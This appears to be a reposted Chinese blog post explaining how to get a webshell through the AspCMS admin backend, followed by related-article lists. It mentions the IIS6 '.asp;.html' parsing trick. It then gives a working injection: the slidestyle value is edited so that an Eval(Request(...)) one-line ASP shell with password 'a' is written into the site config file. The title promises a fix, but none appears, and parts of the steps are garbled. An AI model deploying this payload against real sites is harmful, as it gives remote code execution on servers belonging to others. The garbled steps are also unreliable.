aspcms后台拿shell漏洞(非添加模块)及修复方法
aspcms在老版本中能够经过添加模板直接添加asp.可是新版的aspcms中已经限制了添加模板的格式为html,js,css,固然若是是遇到iis6的话仍是能够经过iis6的解析漏洞把文件名改为1.asp;.html这样的格式来拿到shell的.但是若是遇到iis7.5呢?如下是本人本身找到挖掘到的aspcms通杀版本的后台拿shell方法.
一、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”css
二、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就行了。将对应的slidestyle的value的值修改成1%><%Eval(Request (chr(65)))%><%html
三、一句话***,密码a。在/config/AspCms_Config.aspshell
4.ide
管理员漏洞工具
相关文章
- 1. 拿shell之CVE-2019-0708漏洞复现
- 2. 【WEB】aspcms漏洞利用
- 3. android添加帐户流程分析涉及漏洞修复
- 4. WebLogic SSRF 及漏洞修复
- 5. ASP上传漏洞拿shell
- 6. Web漏洞检测及修复方案
- 7. JumpServer漏洞通知及修复方案
- 8. 浅谈漏洞修复的方法论
- 9. emlog重大漏洞修复方法
- 10. 安全漏洞修复方法
- 更多相关文章...
- • Lua 模块与包 - Lua 教程
- • Eclipse 快速修复 - Eclipse 教程
- • 委托模式
- • Flink 数据传输及反压详解
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 拿shell之CVE-2019-0708漏洞复现
- 2. 【WEB】aspcms漏洞利用
- 3. android添加帐户流程分析涉及漏洞修复
- 4. WebLogic SSRF 及漏洞修复
- 5. ASP上传漏洞拿shell
- 6. Web漏洞检测及修复方案
- 7. JumpServer漏洞通知及修复方案
- 8. 浅谈漏洞修复的方法论
- 9. emlog重大漏洞修复方法
- 10. 安全漏洞修复方法